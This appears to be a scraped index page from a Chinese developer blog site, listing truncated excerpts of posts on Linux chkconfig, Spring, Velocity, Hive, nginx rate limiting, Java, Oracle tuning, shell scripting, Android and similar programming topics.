Linux中修改系统服务的命令是chkconfig (check config)，命令的详细解释如下: chkconfig 功能说明：检查，设置系统的各种服务。语　　法：chkconfig [ -- add][ -- del][ -- list][系统服务] 或 chkconfig [ -- level <</SPAN>
spring拦截器的一个简单实例 bijian1013 java spring 拦截器 Interceptor
Purview接口 package aop; public interface Purview { void checkLogin(); } Purview接口的实现类PurviesImpl.java package aop; public class PurviewImpl implements Purview { public void check
[Velocity二]自定义Velocity指令 bit1129 velocity
什么是Velocity指令在Velocity中，#set,#if, #foreach, #elseif, #parse等，以#开头的称之为指令，Velocity内置的这些指令可以用来做赋值，条件判断，循环控制等脚本语言必备的逻辑控制等语句，Velocity的指令是可扩展的，即用户可以根据实际的需要自定义Velocity指令自定义指令(Directive)的一般步骤 &nbs
【Hive十】Programming Hive学习笔记 bit1129 programming
第二章 Getting Started 1.Hive最大的局限性是什么？一是不支持行级别的增删改(insert, delete, update)二是查询性能非常差(基于Hadoop MapReduce）,不适合延迟小的交互式任务三是不支持事务2. Hive MetaStore是干什么的？Hive persists table schemas and other system metadata.
nginx有选择性进行限制 ronin47 nginx 动静　限制
http { limit_conn_zone $binary_remote_addr zone=addr:10m; limit_req_zone $binary_remote_addr zone=one:10m rate=5r/s;... server {... location ~.*\.(gif|png|css|js|icon)$ {
java-4.-在二元树中找出和为某一值的所有路径 . bylijinnan java
/* * 0.use a TwoWayLinkedList to store the path.when the node can't be path,you should/can delete it. * 1.curSum==exceptedSum:if the lastNode is TreeNode,printPath();delete the node otherwise
Netty学习笔记 bylijinnan java netty
本文是阅读以下两篇文章时： http://seeallhearall.blogspot.com/2012/05/netty-tutorial-part-1-introduction-to.html http://seeallhearall.blogspot.com/2012/06/netty-tutorial-part-15-on-channel.html 我的一些笔记 ===
js获取项目路径 cngolon js
//js获取项目根路径，如： http://localhost:8083/uimcardprj function getRootPath(){ //获取当前网址，如： http://localhost:8083/uimcardprj/share/meun.jsp var curWwwPath=window.document.locati
oracle 的性能优化 cuishikuan oracle SQL Server
在网上搜索了一些Oracle性能优化的文章，为了更加深层次的巩固[边写边记]，也为了可以随时查看，所以发表这篇文章。 1.ORACLE采用自下而上的顺序解析WHERE子句，根据这个原理，表之间的连接必须写在其他WHERE条件之前，那些可以过滤掉最大数量记录的条件必须写在WHERE子句的末尾。（这点本人曾经做过实例验证过，的确如此哦！
Shell变量和数组使用详解 daizj linux shell 变量数组
Shell 变量定义变量时，变量名不加美元符号（$，PHP语言中变量需要），如： your_name="w3cschool.cc" 注意，变量名和等号之间不能有空格，这可能和你熟悉的所有编程语言都不一样。同时，变量名的命名须遵循如下规则：首个字符必须为字母（a-z，A-Z）。中间不能有空格，可以使用下划线（_）。不能使用标点符号。不能使用ba
编程中的一些概念，KISS、DRY、MVC、OOP、REST dcj3sjt126com REST
KISS、DRY、MVC、OOP、REST （1）KISS是指Keep It Simple,Stupid（摘自wikipedia），指设计时要坚持简约原则，避免不必要的复杂化。（2）DRY是指Don't Repeat Yourself（摘自wikipedia），特指在程序设计以及计算中避免重复代码，因为这样会降低灵活性、简洁性，并且可能导致代码之间的矛盾。（3）OOP 即Object-Orie
[Android]设置Activity为全屏显示的两种方法 dcj3sjt126com Activity
1. 方法1：AndroidManifest.xml 里，Activity的 android:theme 指定为" @android:style/Theme.NoTitleBar.Fullscreen" 示例: <application
solrcloud 部署方式比较 eksliang solrCloud
solrcloud 的部署其实有两种方式可选，那么我们在实践开发中应该怎样选择呢？第一种：当启动solr服务器时，内嵌的启动一个Zookeeper服务器，然后将这些内嵌的Zookeeper服务器组成一个集群。第二种：将Zookeeper服务器独立的配置一个集群，然后将solr交给Zookeeper进行管理谈谈第一种：每启动一个solr服务器就内嵌的启动一个Zoo
Java synchronized关键字详解 gqdy365 synchronized
转载自：http://www.cnblogs.com/mengdd/archive/2013/02/16/2913806.html 多线程的同步机制对资源进行加锁，使得在同一个时间，只有一个线程可以进行操作，同步用以解决多个线程同时访问时可能出现的问题。同步机制可以使用synchronized关键字实现。当synchronized关键字修饰一个方法的时候，该方法叫做同步方法。当s
js实现登录时记住用户名 hw1287789687 记住我记住密码 cookie 记住用户名记住账号
在页面中如何获取cookie值呢? 如果是JSP的话,可以通过servlet的对象request 获取cookie,可以参考:http://hw1287789687.iteye.com/blog/2050040 如果要求登录页面是html呢?html页面中如何获取cookie呢? 直接上代码了页面:loginInput.html 代码: <!DOCTYPE html PUB
开发者必备的 Chrome 扩展 justjavac chrome
Firebug：不用多介绍了吧https://chrome.google.com/webstore/detail/bmagokdooijbeehmkpknfglimnifench ChromeSnifferPlus：Chrome 探测器，可以探测正在使用的开源软件或者 js 类库https://chrome.google.com/webstore/detail/chrome-sniffer-pl
算法机试题李亚飞 java 算法机试题
在面试机试时，遇到一个算法题，当时没能写出来，最后是同学帮忙解决的。这道题大致意思是：输入一个数，比如4,。这时会输出： &n
正确配置Linux系统ulimit值字符串 ulimit
在Linux下面部署应用的时候，有时候会遇上Socket/File: Can’t open so many files的问题；这个值也会影响服务器的最大并发数，其实Linux是有文件句柄限制的，而且Linux默认不是很高，一般都是1024，生产服务器用其实很容易就达到这个数量。下面说的是，如何通过正解配置来改正这个系统默认值。因为这个问题是我配置Nginx+php5时遇到了，所以我将这篇归纳进
hibernate调用返回游标的存储过程 Supanccy2013 java DAO oracle Hibernate jdbc
注：原创作品，转载请注明出处。上篇博文介绍的是hibernate调用返回单值的存储过程，本片博文说的是hibernate调用返回游标的存储过程。此此扁博文的存储过程的功能相当于是jdbc调用select 的作用。 1，创建oracle中的包，并在该包中创建的游标类型。 ---创建oracle的程
Spring 4.2新特性-更简单的Application Event wiselyman application
1.1 Application Event Spring 4.1的写法请参考10点睛Spring4.1-Application Event 请对比10点睛Spring4.1-Application Event 使用一个@EventListener取代了实现ApplicationListener接口,使耦合度降低; 1.2 示例包依赖 <p